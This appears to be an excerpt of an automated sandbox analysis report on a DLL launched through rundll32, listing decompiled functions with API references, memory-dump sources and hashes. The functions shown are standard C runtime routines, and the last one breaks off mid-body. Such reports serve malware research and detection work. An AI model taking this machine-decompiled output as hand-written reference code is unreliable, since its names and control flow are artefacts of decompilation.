Instruction Fuzzy Hash: E5F05E3A200516BFDB126B96CD48B467BF6EFCA261B11441AFB49C6530CA31A850DB64

Uniqueness

Uniqueness Score: -1.00%

Function 1003B9BA, Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1003B9BA(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x1004d8f0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E1003B9A3();
					E1003B965();
					_t13 = WriteConsoleW( *0x1004d8f0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x1003b9d7
0x1003b9db
0x1003b9e8
0x1003b9ed
0x1003ba08
0x1003ba08
0x1003ba0e

APIs

WriteConsoleW.KERNEL32 ref: 1003B9D1
GetLastError.KERNEL32(?,100395D6,?,00000001,?,00000001,?,10032A34,?,?,00000001,?,00000001,?,10032F91,1002B316), ref: 1003B9DD

Part of subcall function 1003B9A3: CloseHandle.KERNEL32(FFFFFFFE), ref: 1003B9B3

___initconout.LIBCMT ref: 1003B9ED

Part of subcall function 1003B965: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 1003B978

WriteConsoleW.KERNEL32 ref: 1003BA02

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 5da5c4793209c74a93b238e7f3eb4125497ecebd09cd7aca8a72de3c159ab4d2
Instruction ID: b907945a8bb2440a8cb3aef72e6a2d2f21cc4e48b824f8509c024221972a3f23
Opcode Fuzzy Hash: 5da5c4793209c74a93b238e7f3eb4125497ecebd09cd7aca8a72de3c159ab4d2
Instruction Fuzzy Hash: 50F01236100566BFDB126F91CC48A893F65EF092A1F014015FF08D6130C6318860DBD5

Uniqueness

Uniqueness Score: -1.00%

Function 10011DD7, Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10011DD7() {

				E100268B3( *0x1004e850);
				 *0x1004e850 = 0;
				E100268B3( *0x1004e854);
				 *0x1004e854 = 0;
				E100268B3( *0x1004e538);
				 *0x1004e538 = 0;
				E100268B3( *0x1004e53c);
				 *0x1004e53c = 0;
				return 1;
			}

0x10011de0
0x10011ded
0x10011df3
0x10011dfe
0x10011e04
0x10011e0f
0x10011e15
0x10011e1d
0x10011e26

APIs

_free.LIBCMT ref: 10011DE0

Part of subcall function 100268B3: HeapFree.KERNEL32(00000000,00000000), ref: 100268C9
Part of subcall function 100268B3: GetLastError.KERNEL32(?,?,1002F4C1,?,00000000,?,00000000,?,1002F7E1,?,00000007,?,?,1002E30A,?,?), ref: 100268DB

_free.LIBCMT ref: 10011DF3
_free.LIBCMT ref: 10011E04
_free.LIBCMT ref: 10011E15

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 07ee624c573888530ac5761be1d19be9513cbb8fe5f39405c8f430c56bec78f2
Instruction ID: b92291fbf5b9387dec10b5d829ed7a1edaa60bcb681d517941d5f30f05375802
Opcode Fuzzy Hash: 07ee624c573888530ac5761be1d19be9513cbb8fe5f39405c8f430c56bec78f2
Instruction Fuzzy Hash: FBE0B6798199B0ABFB02AF54FFC14493BA1E74A758345015EFC08D2231DF351E629F99

Uniqueness

Uniqueness Score: -1.00%

Function 100250E8, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E100250E8(signed int __edx, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24) {
				signed int _v8;
				intOrPtr _v20;
				char _v180;
				short _v202;
				short _v204;
				short _v206;
				signed short _v208;
				signed short _v210;
				signed short _v212;
				char _v468;
				signed int* _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int* _v488;
				signed int _v492;
				signed int _v496;
				char _v512;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t83;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t95;
				signed int _t97;
				signed int _t101;
				signed short _t102;
				signed short _t104;
				signed int _t106;
				void* _t109;
				signed int _t110;
				signed int _t114;
				intOrPtr _t119;
				signed int _t127;
				signed int _t129;
				signed short _t133;
				signed int _t135;
				char* _t136;
				signed int _t137;
				intOrPtr _t140;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t152;
				signed int* _t153;
				void* _t154;
				signed int* _t160;
				void* _t162;
				void* _t164;
				intOrPtr* _t176;
				signed int _t177;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				intOrPtr* _t185;
				signed int* _t189;
				signed int _t191;
				intOrPtr _t192;
				signed int* _t193;
				signed int _t195;
				void* _t196;
				signed int* _t197;
				signed int _t198;
				signed int _t199;
				void* _t200;

				_t191 = __edx;
				_t83 =  *0x1004d054; // 0xda1f8931
				_v8 = _t83 ^ _t199;
				_t149 = _a8;
				_t197 = _a4;
				_v488 = _a24;
				_t86 = 0;
				_v496 = _t149;
				_t192 = _a16;
				if(_t197 == 0) {
					L70:
					return E100037EA(_t86, _v8 ^ _t199, _t191);
				} else {
					_v484 = 0;
					if( *_t197 != 0x43 || _t197[0] != 0) {
						_t89 = E10023FB6(_t154, _t191) + 0x50;
						_t13 = _t89 + 0x18; // -56
						_v472 = _t13;
						_t15 = _t89 + 0x122; // 0xd2
						_t150 = _t15;
						_t16 = _t89 + 0x1c; // -52
						_v476 = _t150;
						_v480 = _t16;
						E100249B6(_t150,  &_v512, _t192, _t192, _a20, E10023FB6(_t154, _t191) + 0x50);
						_t193 = _t197;
						_t191 = 0;
						__eflags = 0;
						_t160 =  &(_t193[0]);
						do {
							_t91 =  *_t193;
							_t193 =  &(_t193[0]);
							__eflags = _t91;
						} while (_t91 != 0);
						_t195 = _t193 - _t160 >> 1;
						_v492 = _t195;
						__eflags = _t195 - 0x83;
						if(_t195 >= 0x83) {
							L24:
							_t92 = E1002A5FE();
							__eflags = _t92;
							_t152 = 0 | _t92 == 0x00000000;
							_t94 = E10024EA3(_t152, _t160, _t191, _t195,  &_v468, _t197);
							_pop(_t162);
							__eflags = _t94;
							if(_t94 != 0) {
								_t153 = _v472;
								goto L33;
							} else {
								_t136 =  &_v468;
								__eflags = _t152;
								_t153 = _v472;
								_push(_t136);
								_push(_t153);
								_push(_t136);
								if(__eflags == 0) {
									_t137 = E100303BF(_t162, _t191, __eflags);
								} else {
									_t137 = E10030D3E(_t162, _t191, __eflags);
								}
								_t200 = _t200 + 0xc;
								__eflags = _t137;
								if(_t137 == 0) {
									L33:
									_t95 = E1002A35B(_t197);
									_push(_t197);
									__eflags = _t95;
									if(_t95 == 0) {
										_push( &_v468);
										_t97 = E1002605B();
										_pop(_t164);
										__eflags = _t97;
										if(_t97 == 0) {
											L67:
											__eflags = 0;
											_t149 = 0;
											goto L68;
										} else {
											_t101 = E1002A35B( &_v180);
											__eflags = _t101;
											if(_t101 == 0) {
												goto L67;
											} else {
												_t102 = _v212;
												__eflags = _t102;
												if(_t102 == 0) {
													_t104 = E1002602C(_t164,  &_v180);
													goto L55;
												} else {
													_t182 = _t102 & 0x0000ffff;
													__eflags = _t182 - 0x41 - 0x19;
													if(_t182 - 0x41 <= 0x19) {
														_t182 = _t182 + 0x20;
														__eflags = _t182;
													}
													_t191 = 0x38;
													__eflags = _t182 - 0x75;
													if(_t182 != 0x75) {
														L50:
														__eflags = _v206 - 0x2d;
														if(_v206 != 0x2d) {
															goto L67;
														} else {
															__eflags = _v204 - _t191;
															if(_v204 != _t191) {
																goto L67;
															} else {
																__eflags = _v202;
																if(_v202 != 0) {
																	goto L67;
																} else {
																	goto L53;
																}
															}
														}
													} else {
														_t183 = _v210 & 0x0000ffff;
														__eflags = _t183 - 0x41 - 0x19;
														if(_t183 - 0x41 <= 0x19) {
															_t183 = _t183 + 0x20;
															__eflags = _t183;
														}
														__eflags = _t183 - 0x74;
														if(_t183 != 0x74) {
															goto L50;
														} else {
															_t184 = _v208 & 0x0000ffff;
															__eflags = _t184 - 0x41 - 0x19;
															if(_t184 - 0x41 <= 0x19) {
																_t184 = _t184 + 0x20;
																__eflags = _t184;
															}
															__eflags = _t184 - 0x66;
															if(_t184 != 0x66) {
																goto L50;
															} else {
																__eflags = _v206 - _t191;
																if(_v206 != _t191) {
																	goto L50;
																} else {
																	__eflags = _v204;
																	if(_v204 == 0) {
																		L53:
																		_t104 = 0xfde9;
																		L55:
																		_t196 = _t195 + 1;
																		_push(_t196);
																		 *_t153 = _t104 & 0x0000ffff;
																		_t149 = _v476;
																		_t106 = E1002FBCB(_t149, 0x83, _t197);
																		_t200 = _t200 + 0x10;
																		__eflags = _t106;
																		if(_t106 != 0) {
																			goto L71;
																		} else {
																			_t176 =  &_v180;
																			_t191 = _t176 + 2;
																			do {
																				_t119 =  *_t176;
																				_t176 = _t176 + 2;
																				__eflags = _t119 - _v484;
																			} while (_t119 != _v484);
																			_t177 = _t176 - _t191;
																			__eflags = _t177;
																			_push((_t177 >> 1) + 1);
																			_push( &_v180);
																			goto L59;
																		}
																	} else {
																		goto L50;
																	}
																}
															}
														}
													}
												}
											}
										}
									} else {
										_t133 = E1002602C(_t162);
										_t196 = _t195 + 1;
										_push(_t196);
										 *_t153 = _t133 & 0x0000ffff;
										_t149 = _v476;
										_t135 = E1002FBCB(_t149, 0x83, _t197);
										_t200 = _t200 + 0x14;
										__eflags = _t135;
										if(_t135 != 0) {
											goto L71;
										} else {
											_push(_t196);
											_push(_t197);
											L59:
											E10024C94( &_v512, _t197);
											goto L60;
										}
									}
								} else {
									_t149 = _v476;
									_push( &_v468);
									E10024E33(_t149, _t162, _t191, _t195, _t149, 0x83);
									_t185 =  &_v180;
									_t200 = _t200 + 0xc;
									_t191 = _t185 + 2;
									do {
										_t140 =  *_t185;
										_t185 = _t185 + 2;
										__eflags = _t140 - _v484;
									} while (_t140 != _v484);
									E10024CD8( &_v512, _t197,  &_v180, (_t185 - _t191 >> 1) + 1);
									_t196 = _t195 + 1;
									L60:
									__eflags =  *_t197;
									if( *_t197 == 0) {
										L64:
										__eflags = 0;
										 *_v480 = 0;
										goto L65;
									} else {
										__eflags = _v492 - 0x83;
										if(_v492 >= 0x83) {
											goto L64;
										} else {
											_push(_t196);
											_t129 = E1002FBCB(_v480, 0x83, _t197);
											_t200 = _t200 + 0x10;
											__eflags = _t129;
											if(_t129 == 0) {
												goto L65;
											} else {
												goto L71;
											}
										}
									}
								}
							}
						} else {
							_t189 = _t197;
							_t144 = _t150;
							while(1) {
								_t191 =  *_t144;
								__eflags = _t191 -  *_t189;
								if(_t191 !=  *_t189) {
									break;
								}
								__eflags = _t191;
								if(_t191 == 0) {
									L13:
									_t145 = 0;
								} else {
									_t191 =  *((intOrPtr*)(_t144 + 2));
									__eflags = _t191 - _t189[0];
									if(_t191 != _t189[0]) {
										break;
									} else {
										_t144 = _t144 + 4;
										_t189 =  &(_t189[1]);
										__eflags = _t191;
										if(_t191 != 0) {
											continue;
										} else {
											goto L13;
										}
									}
								}
								L15:
								__eflags = _t145;
								if(_t145 == 0) {
									L65:
									 *_v488 =  *_v472;
									_t127 = E10028A30(_v496, _a12, _t149);
									__eflags = _t127;
									if(_t127 != 0) {
										goto L71;
									} else {
										L68:
										E10024A36( &_v512);
										goto L69;
									}
								} else {
									_t146 = _v480;
									_t160 = _t197;
									while(1) {
										_t191 =  *_t146;
										__eflags = _t191 -  *_t160;
										if(_t191 !=  *_t160) {
											break;
										}
										__eflags = _t191;
										if(_t191 == 0) {
											L21:
											_t147 = 0;
										} else {
											_t191 =  *((intOrPtr*)(_t146 + 2));
											__eflags = _t191 - _t160[0];
											if(_t191 != _t160[0]) {
												break;
											} else {
												_t146 = _t146 + 4;
												_t160 =  &(_t160[1]);
												__eflags = _t191;
												if(_t191 != 0) {
													continue;
												} else {
													goto L21;
												}
											}
										}
										L23:
										__eflags = _t147;
										if(_t147 == 0) {
											goto L65;
										} else {
											goto L24;
										}
										goto L84;
									}
									asm("sbb eax, eax");
									_t147 = _t146 | 0x00000001;
									__eflags = _t147;
									goto L23;
								}
								goto L84;
							}
							asm("sbb eax, eax");
							_t145 = _t144 | 0x00000001;
							__eflags = _t145;
							goto L15;
						}
					} else {
						_t148 = E10028A30(_t149, _a12, 0x10044e50);
						if(_t148 != 0) {
							L71:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E1000E341();
							asm("int3");
							_push(8);
							_push(0x1004b2f8);
							_t109 = E100040F0();
							_t198 = _a4;
							__eflags = _t198;
							if(_t198 != 0) {
								_t110 = E1002651E(5);
								_v8 = _v8 & 0x00000000;
								__eflags =  *(_t198 + 4);
								if( *(_t198 + 4) != 0) {
									__eflags = _t110 | 0xffffffff;
									asm("lock xadd [ecx], eax");
									if((_t110 | 0xffffffff) == 0) {
										__eflags =  *(_t198 + 4) - 0x1004d180;
										if( *(_t198 + 4) != 0x1004d180) {
											E100268B3( *(_t198 + 4));
										}
									}
								}
								_v8 = 0xfffffffe;
								E1002555B();
								__eflags =  *_t198;
								if( *_t198 != 0) {
									E1002651E(4);
									_v8 = 1;
									E1002E33E( *_t198);
									_t114 =  *_t198;
									__eflags = _t114;
									if(_t114 != 0) {
										__eflags =  *(_t114 + 0xc);
										if( *(_t114 + 0xc) == 0) {
											__eflags = _t114 - 0x1004d0b8;
											if(_t114 != 0x1004d0b8) {
												E1002E173(_t114);
											}
										}
									}
									_v8 = 0xfffffffe;
									E10025567();
								}
								_t109 = E100268B3(_t198);
							}
							 *[fs:0x0] = _v20;
							return _t109;
						} else {
							 *_v488 = _t148;
							L69:
							_t86 = _t149;
							goto L70;
						}
					}
				}
				L84:
			}

APIs

_free.LIBCMT ref: 100254ED
_free.LIBCMT ref: 10025542

Strings

-, xrefs: 10025390

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID: -
API String ID: 269201875-2547889144
Opcode ID: 182027e96e950bcb7a76d4b4b57f72c40b47ad3f81e16720650cf2bf331a3730
Instruction ID: 66f1abc88b353573048c8297ce13dc3db2c99bd53dfa5fdd719ba2a4e5362786
Opcode Fuzzy Hash: 182027e96e950bcb7a76d4b4b57f72c40b47ad3f81e16720650cf2bf331a3730
Instruction Fuzzy Hash: 16C109759002569BDB20DF64EC51BEEB3F4EF05386F9140AAE80697181EB72AFC4CB54

Uniqueness

Uniqueness Score: -1.00%

Function 1000ED39, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000ED39(intOrPtr _a4, signed int _a8, intOrPtr* _a12, signed int _a16, signed char _a20) {
				signed char _v5;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v60;
				char _v64;
				intOrPtr* _t82;
				signed int _t84;
				signed int _t86;
				signed int _t90;
				signed int _t91;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed char _t100;
				signed int _t102;
				signed int _t103;
				signed char _t114;
				signed int _t116;
				void* _t117;
				intOrPtr* _t119;
				signed int _t128;
				signed char _t129;
				signed char _t131;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				void* _t144;
				signed int _t146;
				intOrPtr* _t147;
				signed int _t149;
				signed int _t150;
				void* _t151;

				if(E1000FB3F( &_a8) == 0) {
					L5:
					_t128 = 0;
					_t150 = 0;
					L6:
					_t82 = _a12;
					if(_t82 != 0) {
						 *_t82 = _a8;
					}
					return _t128;
				}
				_t84 = _a16;
				if(_t84 == 0) {
					L9:
					E1000F794( &_v64, _t144, _a4);
					_t86 = _a8;
					_t149 = 0;
					_v20 = 0;
					_t150 = 0;
					_v48 = _t86;
					L11:
					_t129 =  *_t86;
					_a8 = _t86 + 1;
					_v16 = _t129;
					_v5 = _t129;
					_t90 = E1000FEA3(_t129 & 0x000000ff, 8,  &_v60);
					_t151 = _t151 + 0xc;
					__eflags = _t90;
					if(_t90 != 0) {
						_t86 = _a8;
						goto L11;
					}
					_t91 = _a20 & 0x000000ff;
					_v12 = _t91;
					__eflags = _t129 - 0x2d;
					if(_t129 != 0x2d) {
						__eflags = _t129 - 0x2b;
						if(_t129 != 0x2b) {
							_t146 = _a8;
							goto L17;
						}
						goto L15;
					} else {
						_v12 = _t91 | 0x00000002;
						L15:
						_t147 = _a8;
						_t129 =  *_t147;
						_t146 = _t147 + 1;
						_v5 = _t129;
						_v16 = _t129;
						_a8 = _t146;
						L17:
						_t135 = _a16;
						__eflags = _t135;
						if(_t135 == 0) {
							L19:
							__eflags = _t129 - 0x30 - 9;
							if(_t129 - 0x30 > 9) {
								__eflags = _t129 - 0x61 - 0x19;
								if(_t129 - 0x61 > 0x19) {
									_t97 = _t129 - 0x41;
									__eflags = _t97 - 0x19;
									if(_t97 > 0x19) {
										_t98 = _t97 | 0xffffffff;
										__eflags = _t98;
									} else {
										_t98 = _t129 + 0xffffffc9;
									}
								} else {
									_t98 = _t129 + 0xffffffa9;
								}
							} else {
								_t98 = _t129 + 0xffffffd0;
							}
							__eflags = _t98;
							if(_t98 == 0) {
								_t99 =  *_t146;
								_t146 = _t146 + 1;
								_v28 = _t99;
								_a8 = _t146;
								__eflags = _t99 - 0x78;
								if(_t99 == 0x78) {
									L35:
									__eflags = _t135;
									if(_t135 == 0) {
										_a16 = 0x10;
									}
									_t100 =  *_t146;
									_v5 = _t100;
									_v16 = _t100;
									_a8 = _t146 + 1;
									L34:
									_t102 = _a16;
									L39:
									asm("cdq");
									_push(_t129);
									_t136 = _t146;
									_v44 = _t102;
									_v40 = _t136;
									_t103 = E1003F7B0(0xffffffff, 0xffffffff, _t102, _t136);
									_v32 = _t129;
									_t131 = _v12;
									_v36 = _t136;
									_t137 = _v5;
									_v24 = _t103;
									_v28 = _t146;
									while(1) {
										__eflags = _t137 - 0x30 - 9;
										if(_t137 - 0x30 > 9) {
											__eflags = _t137 - 0x61 - 0x19;
											if(_t137 - 0x61 > 0x19) {
												__eflags = _t137 - 0x41 - 0x19;
												if(_t137 - 0x41 > 0x19) {
													_t138 = _t137 | 0xffffffff;
													__eflags = _t138;
												} else {
													_t138 = _t137 + 0xffffffc9;
												}
											} else {
												_t138 = _t137 + 0xffffffa9;
											}
										} else {
											_t138 = _t137 + 0xffffffd0;
										}
										_v12 = _t138;
										__eflags = _t138 - 0xffffffff;
										if(_t138 == 0xffffffff) {
											break;
										}
										__eflags = _t138 - _a16;
										if(_t138 >= _a16) {
											break;
										}
										_t116 = _v20;
										_t131 = _t131 | 0x00000008;
										__eflags = _t150 - _t146;
										if(__eflags < 0) {
											L58:
											_v12 = _t138;
											L59:
											_t117 = E1003F850(_v44, _v40, _t116, _t150);
											_t150 = _t146;
											_v20 = _t117 + _v12;
											asm("adc esi, edi");
											L60:
											_t119 = _a8;
											_t146 = _v28;
											_t137 =  *_t119;
											_v16 = _t137;
											_a8 = _t119 + 1;
											continue;
										}
										_t146 = _v24;
										if(__eflags > 0) {
											L52:
											__eflags = _t116 - _t146;
											if(_t116 != _t146) {
												L57:
												_t131 = _t131 | 0x00000004;
												goto L60;
											}
											__eflags = _t150 - _v28;
											if(_t150 != _v28) {
												goto L57;
											}
											__eflags = _t149 - _v32;
											if(__eflags < 0) {
												goto L59;
											}
											if(__eflags > 0) {
												goto L57;
											}
											__eflags = _t138 - _v36;
											if(_t138 <= _v36) {
												goto L59;
											}
											goto L57;
										}
										__eflags = _t116 - _t146;
										if(_t116 < _t146) {
											goto L58;
										}
										goto L52;
									}
									_v12 = _t131;
									E1000FAE8( &_a8, _v16);
									__eflags = _t131 & 0x00000008;
									if((_t131 & 0x00000008) != 0) {
										_t128 = _v20;
										__eflags = E1000E497(_v12, _t128, _t150);
										if(__eflags == 0) {
											__eflags = _v12 & 0x00000002;
											if((_v12 & 0x00000002) != 0) {
												_t128 =  ~_t128;
												asm("adc esi, edi");
												_t150 =  ~_t150;
											}
											L72:
											__eflags = _v52;
											if(_v52 != 0) {
												 *(_v64 + 0x350) =  *(_v64 + 0x350) & 0xfffffffd;
											}
											goto L6;
										}
										 *((intOrPtr*)(E1002449E(__eflags))) = 0x22;
										_t114 = _v12;
										__eflags = _t114 & 0x00000001;
										if((_t114 & 0x00000001) != 0) {
											__eflags = _t114 & 0x00000002;
											if((_t114 & 0x00000002) == 0) {
												_t149 = _t149 | 0xffffffff;
												__eflags = _t149;
												_t150 = 0x7fffffff;
											} else {
												_t150 = 0x80000000;
											}
											L69:
											_t128 = _t149;
											goto L72;
										}
										_t128 = _t128 | 0xffffffff;
										_t150 = _t150 | 0xffffffff;
										goto L72;
									}
									_t150 = _t149;
									_a8 = _v48;
									goto L69;
								}
								__eflags = _t99 - 0x58;
								if(_t99 == 0x58) {
									goto L35;
								}
								__eflags = _t135;
								if(_t135 == 0) {
									_a16 = 8;
								}
								E1000FAE8( &_a8, _v28);
								goto L34;
							}
							__eflags = _t135;
							if(_t135 != 0) {
								L38:
								_t102 = _t135;
								goto L39;
							}
							_t102 = 0xa;
							_a16 = _t102;
							goto L39;
						}
						__eflags = _t135 - 0x10;
						if(_t135 != 0x10) {
							goto L38;
						}
						goto L19;
					}
				}
				if(_t84 < 2) {
					L4:
					 *((intOrPtr*)(E1002449E(_t156))) = 0x16;
					E1000E314();
					goto L5;
				}
				_t156 = _t84 - 0x24;
				if(_t84 <= 0x24) {
					goto L9;
				}
				goto L4;
			}

APIs

__aulldvrm.LIBCMT ref: 1000EEA4

Strings

-, xrefs: 1000EDD2
+, xrefs: 1000EDDF

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 46df5ecb2115870ebc51702f835dafacfc7ca39e1ce3594c4648c089db74f28f
Instruction ID: 161e414dc9c41f8d3233c1f3fc7934caf211311be282c5be911a7171b8d9abf8
Opcode Fuzzy Hash: 46df5ecb2115870ebc51702f835dafacfc7ca39e1ce3594c4648c089db74f28f
Instruction Fuzzy Hash: 7E91C370D042DE9EEF14CE68C8506EDBBB1EF453E0F14866AE875BB299D3309D418B51

Uniqueness

Uniqueness Score: -1.00%

Function 10010849, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E10010849(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E100282F8(_t48);
						E10027C80(_t57, 0, 0x1004e070, 0x104);
						_t26 =  *0x1004e540; // 0x362c98
						 *0x1004e52c = 0x1004e070;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x1004e070;
							_v20 = 0x1004e070;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E10010F75(E10010AE4( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E10010AE4( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E10027ABF(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x1004e534 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x1004e538 = _t58;
											L18:
											E100268B3(_t37);
											_v12 = 0;
											L19:
											E100268B3(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x1004e534 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x1004e538 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E1002449E(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E1002449E(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E1000E314();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 1001088C, 10010893, 100108C9

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 89d77395745d81d233aacb16cc1e66d02bdacb5c1c833554ea3477ca4157bf35
Instruction ID: 4195f098a662b01fce56375507ef603a022793ef94c33478d48d106903ee8a7f
Opcode Fuzzy Hash: 89d77395745d81d233aacb16cc1e66d02bdacb5c1c833554ea3477ca4157bf35
Instruction Fuzzy Hash: 7841B375B04254AFEB11DB99DD8199EBBF8EF85350F100066F884DB252EAB0DE80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 100052F0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E100052F0(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t68;
				signed int _t75;
				intOrPtr _t76;
				void* _t77;
				signed int _t78;
				intOrPtr _t80;
				signed int _t83;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				signed int _t95;
				char _t97;
				signed int _t103;
				signed int _t104;
				signed int _t111;
				void* _t112;
				intOrPtr _t113;
				signed int _t114;
				signed int _t116;
				void* _t117;
				void* _t118;
				void* _t125;

				_t108 = __edx;
				_t90 = _a4;
				_v5 = 0;
				_v16 = 1;
				 *_t90 = E10041E47(__ecx,  *_t90);
				_t91 = _a8;
				_t6 = _t91 + 0x10; // 0x11
				_t114 = _t6;
				_v20 = _t114;
				_v12 =  *(_t91 + 8) ^  *0x1004d054;
				E100052B0(__edx, _t112, _t114,  *(_t91 + 8) ^  *0x1004d054, _t114);
				E10006AD7(_a12);
